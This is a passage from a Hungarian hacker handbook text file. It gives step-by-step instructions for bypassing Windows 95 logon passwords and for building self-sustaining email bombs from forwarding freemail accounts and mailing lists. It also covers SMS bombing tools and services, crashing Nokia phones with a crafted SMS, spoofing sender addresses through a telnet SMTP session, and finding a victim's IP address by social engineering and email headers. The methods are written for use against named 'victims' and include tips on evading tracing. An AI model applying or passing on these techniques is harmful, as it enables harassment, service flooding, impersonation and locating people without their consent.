win98.TXT iterjesztése mindig .pwl. Tehát pl. Kiss Norbert jelszava a Kissnorb.pwl-ben van táro lva.) Szóval most minket ugye az administrator sora érdekel (ha nem, akkor hagyd abba az ol vasást). Itt egyrészt megtudhatod, hogy mi az administrator felhasználóneve, másrészt pedig, ha egy kicsit belejavítassz a sorába, akkor el tudod érni, hogy szegénynek ne kelljen mindenféle hülye jelszót gépelnie. Világossaban: Ez volt az eredeti sor: ADMINISTRATOR=C:\WINDOWS\ADMINIST.PWL És ilyenre kell változtatni: ADMINISTRATOR=C:\WINDOWS\ADMINIST.P_L Vagy akármilyenre, lényeg, hogy az elérési útnal becsússzon valami hiba. A másik út a jelszó MEGKERÜLÉSE: Mikor a Windows kéri a jelszót, egyszerûen nyomj egy [Ctrl+Esc]-et, és láss cso dát, jön a futó programok listája. Innen már könnyedén futtathatunk további alkalmazá sokat, pl. az intézõt. Most már át tudjuk írni a System.ini file-t. Na ennyit a Windows 95 védelmérõl... -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------E-mail bomba - program nélkül: Hozzávalók: 2 db freemail cím, vagy akármi más, ingyenes levelezõ rendszerben regisztrált, levél továbbításra beállítható cím; valamint 1 db levelezési lista, amit regisztrálhatsz mondjuk a www.list.to címen. Beállítás: Ezután nincs más dolgunk, mint a levelezõ listára fölírni a 2 által unk készített free címet (tehát az összes levél, ami a lista címére megy, továbbítódi k a 2 free címre). Az 1. freemail fiókot beállítjuk, hogy a leveleit továbbítsa a lis ta címére ([email protected]). Ha ezzel készen vagyunk, álítsuk be a 2. free postafió kot, hogy a beérkezõ leveleit továbbítsa az áldozatnak. Ezután küldünk egy lev elet a 2. free címrõl a lista címére, és a bomba ezzel élesítve van. Ennyi. Er edmény: Fenti tevékenységünkkel végtelen lavínát indítottunk el: a lista az érlez&oti lde; levelet elküldi az 1. és 2. free címnek. A 2. cím elküldi az áldozatnak, az 1. p edig vissza a listának, ami pedig ismét a 2 freemail címnek, stb... Tehát elég 1 db levelet küldeni az 1. free címre, hogy a lavina elinduljon. Ajánlott ezt az 1 levelet a 2. free címrõl írni, mert akkor nehezebb visszavezetni a fo lyamatot, megtalálni az eredeti feladót, mivel a címek eymásra mutatnak! Magyarázat: Miért van szükség az 1. free címre: ugyanis a lista-szerver nem biztos, hogy örülne, ha magának kéne leveleket küldenie. Ha nincs ezellen védve, listánkat törölné. Miért van szükség a 2. free címre: hogy az áldozat ne mondhassa le a listát! Mivel az &otil de; címe nincs fölírva a listára, csak egy másik, ami hozzá továbbítja a leveleket. M iért kell a lista: mert csak a lista képes 1 levelet többfelé továbbítani. Itt a levélbomba 2. fajtája: Hozzávalók: 1 db free cím, valamint hírlevelek, levelezõ listák ismerete. Beállítás: Miután az ingyenes címet elkészítettük, írjuk fel egy rakat levelezõ listára, illetve hírlevélre. Küldik a levelet, hogy nyugtázzuk a döntésünket. Menjünk el a lev élben megadott címre, és ezzel jóváhagyták döntésünket. Pl. sex oldalak "hírlevelei" kiválóak ilyen célra. Ok, szóval miután nyugtáztuk az összes visszakérdezést, elmentü nk a megadott címekre, állítsuk be a free címet, hogy az érkezõ leveleit továb bítsa az áldozat címére. Magyarázat: A nyugtázás miatt nem lehet közvetlenül a károsult címét fölírni a listára, ráadásul így nehéz lesz lemondania is a listát/hírlevelet, mert az áldozat nincs fölírva, csak egy cím, ami neki továbbítja a leveleket. Ingyenes (free) e-mail címeket (melyek képesek levéltovábbításra) itt regisztrálhatsz : http://freemail.hu E-mail bomba 3: Az újabb típusú Outlook-okban lehetõségünk van a levél forráskódjának módosítá sára. Ide írjunk valami kódot, ami kifagyasztja az Internet Explorert. Ha nincs semmi ötleted, akkor mentsd le az alábbi oldalt, és lopj ötleteket a forrásából: http://www .cyberarmy.com/crash.shtml E-mail bomba - ezúttal progival: A mailbomber 24. oldal

win98.TXT programok használata nagyon könnyû egy kezdõ számára is. A gond legfeljebb a server kiválasztása lehet, amin át a sok levél megy majd. Nos ide í rd be a "mail.matav.hu"-t. Itt nem törõdnek az ilyesmivel, és általában elküld i. -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------SMS bomba küldõ programok: Nemrég került a nagyközönség elé a Rel-SMS nevû SMS küldõ program. Ezzel , ha hosszú SMS-t küldesz, földarabolja, és több SMS-ként küldi el. Elég tehát írni e gy 16000 karakter hosszú SMS-t (Hogy hogyan, azt rád bízom, de lehet pl. úgy is, hogy írsz 10 db "x"-et, ezt kimásolod, beilleszted még 9-szer, és máris van 100 karaktered . Ezt is kimásolod, és beilleszted kilencszer, és van ezer karaktered. Ezt is kimásol od...), és elküldeni! 16000 karakter esetén 100 db SMS-t kap a károsult... egészségér e! A program a 777sms szerverét használja, szóval nem tudom, mit szólnak a bombához, de nem hiszem, hogy nagyon leterhelné õket! A program innen tölthetõ le : http://relsms.4u.hu. Ugyancsak jó szolgálatot tehet az SMS-bomber 1.0 nevû program is. Csak be kell írni a tel. számot, meg hogy hány darab SMS-t küldjön neki a program. Kattints ide a letöltéshez! Az MTNSMS szerverét használja. Vodára nem, Westelre viszont MÛKÖDI K!!! Állítólag Pannonra is megy. Nokia telefonok lefagyasztása: Ez a bomba 3210-en és 3310-en módszer SMS-ben Forrás:

lett tesztelve, ezeket rendre kifagyasztotta, csak az a kksi ki-be segített :). Szóval a lényeg az, hogy küldj a nokiás embernek egy pontosan 160db felkiáltójelet, és a siker garantált! Az SMS vírusokról: DPG Mobil Csatorna Írták: Blade Gergely Haverom mesélte, hogy kapott egy

SMS-t, melyben az állt, hogy "Szia, egy vírus vagyok , és most baszhatod az órád és az oplogód!". Haver ekkor még röhögött, de aztán nézett, mert tényleg eltûnt mind a kett&otil de;!!! Ez frankón igaz, a saját szememmel láttam! Van valakinek valami megoldási java slata a problémára? No meg egyáltalán: hogy a faszba mûködhetett ez a program? Ja, a havernak 6150-ese van. No csá. SMS vírusok... ez már nem új. (Ugynis az adatátvitelt támogató telefonokra akár beáll ítási paramétereket is lehet küldeni.) Na most, valaki küld egy "vírust", vagy egy vi rusnak tûnõ beállítást. Ugyanis a Nokia hasonló, mint az Ericcson, lehet "rejtett" menüpontokat aktiválni, illetve egyes menüpontokat elrejteni. Na, annyit ke ll csinálni, hogy a megfelelõ menüket újra kell aktiválni, ha ez nem megy, mer t valami folytán nem engedi, akkor teljes software csere, "format". Küldeni, vagy ily et okozni bárki tud, akinek van egy adatkábele, egy adatot fogadni/küldeni képes teló ja, meg a pl: Westel-nek van is ilyen progija. (Én láttam ilyet a nyári gyakorlaton, szóval, ha van a Westelnél egy jó haver meg egy laza fönök, akkor meg lehet szerezni! !!) SMS bomba 1: Készítsünk egy profile-t a www.sms.ru címen. A regisztrációnál adjuk meg az áldozatun k telefonszámát. Kéri egy e-mail cím adatait. Ezt elõzõleg létrehozhatt uk a freemail.hu, a www.primposta.hu, www.hotmail.com címen. POP3 server-ként adjuk m eg, hogy pl. freemail.hu, username-nek az azonosítónkat, password-hoz pedig természet esen a jelszót (a profiktól bocs, de sokan kérték, hogy mindent szájbarágósan írjak l e!). Az ide érkezõ leveleket a károsult megkapja SMS-ként. Ezután nincs más do lgunk, mint e-mail bombát küldeni a megadott e-mail címre, vagy a címet fölírni minde nféle levelezõ listákra ill. hírlevelekre. Az áldozat elvileg le tudná mondani a szolgáltatást, ehhez kap egy jelszót, de akkor már késõ... a szerver hibájáb ól adódóan nem képes erre: a rendszer nem találja a megadott CGI-t. :-) SMS bomba 2: Ez a bombamódszer sajnos(?) már nem mûködik, mert az adatváltoztatásról is leig azolást kér a Quios. Ettõl függetlenül azért meghagyom, olvassátok el! --- Készítsünk profile-t a www.quios.com címen. Itt adjuk meg saját számunkat. Kapunk egy e-mail címet, ahol az érkezõ SMS-eket továbbítják mobilunkra. Ezután küld egy SMS-t, benne a password-ünkkel. Most menjünk a karbantartáshoz. Írjuk be választott a zonosítónkat, és meg 25. oldal

win98.TXT tudjuk változtatni a tel. számot az áldozat számára! SMS bomba 3: Nos... ezzel nem fog több ezret kapni, mert lassú a szerver, és valami küldési limit is van, viszont idegesítõ tud lenni, folyamatosan megy, és 90% hogy elküldi az SMS-t. Szóval az a lényeg hogy fogsz egy freemail címet és fölírod nyolcvanmillió lev .listára, majd miután a nyugtázást kérõ levelekre válaszoltál, beállítod a tov ábbítást pl. a "[email protected]" címre idézõjelek nélkül. NEM +36, han em simán 36. Én nemrég küldtem a Kaboom!-mal kb. 100 SMS-t úgy, hogy a címzett mezõbe a 36y [email protected] formátumban beírtam a telószámot. -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------Fake Mail küldése Telnettel: Írta: Keresztapa Forrás: alvilág.com Start | Futtatás: telnet mailserver 25, ahol a mailserver az SMTP szervered (kimen&ot ilde; levelek szervere) neve, pl. matavnet.hu vagy smtp.datanet.hu Ha látni akarod, amit begépelsz, a Terminál | Beállításokban kapcsold be a Helyi viss zhangot. A következõkben amit be kell írnod, azt félkövérrel, amit a gép válaszol, azt dõlttel írom. 220 mailserver ESMTP Sendmail 8.10.0/8.10.0; Mon, 19 Mar 2001 20:35:26 GMT helo microsoft.com 250 mailserver Hello hostneved [IP címed], pleased to meet you mail from: [email protected] 250 2.1.0 [email protected]... Sender ok rcpt to: [email protected] 250 2.1.5 [email protected]... Recipient ok data 354 Enter mail, end with "." on a line by itself From: ide mar akarmit irhatsz meg kukac se kell bele (felado) To: ide is azt irsz amit akarsz Subject: a level targya Ide irhatod a level szoveget. Ha kesz vagy a barmulassal, rakj egy pontot a kovetkezo sorba. . 250 2.0.0 f2JKdXQ33578 Message accepted for delivery Megjegyzés: Ki lehet deríteni a küldõt, ugyanis a levélben szerepel a hostneved és az IP c ímed is (a levél forrását kell megnézni, de ezt sokan nem tudják). Kilépni a quit paranccsal lehet. Lehet, hogy szerver nem ilyen bõbeszédû, hanem csak ok üzenetekkel válas zol, illetve a 354 Enter mail, end with "." on a line by itself helyett egy sima go a head-del. Lehet levelet olvasni is telnettel: telnet mailserver 110 user usernév pass jelszó stat - kiírja, hány leveled van retr x - kiírja az x. levelet top x y - kiírja az x. levél elsõ y sorát -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------Az IP cím megszerzésének módszerei: Írta: Dodge Viper 1. A balfasz: kérdezzük meg tõle, mi az IP-je. Ezt, pl. úgy tudjuk elérni, hog y felhívjuk rá az érdeklõdését pl: tudtad, hogy minden gép kap belépéskor egy IP-számot és te neked is van bla, bla, bla. Azt Ip-t úgy nézheti meg a tag, hogy a St art menü -> Futtatáshoz beírja: winipcfg 2. E-mail: Írjunk neki egy e-mailt mindenféle kamu szöveggel, a lényeg hogy jöjjön va lami válasz rá. Ha megkaptuk a levelet, mentsük le. Így kapunk egy *.eml kiterjesztés û filet. Ezután már csak meg kell néznünk egy bármilyen egyszerû wieverre l és máris megkapunk egy csomó adatot, de nekünk most csak ez a pár a fontos: pl.: ba lfasz.matav.hu (d27-bp.matav.hu [145.236.158.78]) Így megvan az IP is és sok esetben az is, hogy hol lakik az illetõ. Persze mint tudjátok elterjedtek az ingyenes e-mail szolgáltatók. Nincs gond. Legtöbbször a páciens valamilyen levelezõ prg -n át használja a szolgáltatást pl: Outlook. Így ugyanazon a mail serveren jön át, te hát ugyanazokat az adatokat kapjuk meg. A gond akkor van, ha az illetõ web-fel ületrõl küldi a levelet, akkor ugyanis csak ezt kapjuk meg a módszerrel: pl.: (ns0.matav.hu [145.456.452.25]). Ilyenkor ez a lófasz sajnos semmit nem ér, ekkor obi van kenobi. Tehát ha te se akarod megszívni, akkor mindig webes felületrõl lev elezz! 3. Chat: A chatek 26. oldal

win98.TXT nagyon jó támadópontok. Itt az ember nick (bece) neve mellé van írv a az Ip-je vagy a hostja. Sajnos már egyre több cseten levették ezt. De pl.: a Talk C afé-n és még jó pár cseten azért van. Ahol nincs kiírva, ott sincs gond. Jöhetnek a b eépített Op-ok. Ilyenek mindenhol vannak. Vagy ha nem lennének akkor jöhetnek a Java- ban írt kis programok. (álltalába minden chathez másik kell) Térjünk vissza a hostra. Hostból IP. Nagyon egyszerû alap módszer, de mindig mûxik a következ&otil de;: hozzávalók: nyiss 1 DOS ablakot, írd be, hogy tracert host pl.: tracert d1-bp.ma tav.hu és kész is.

27. oldal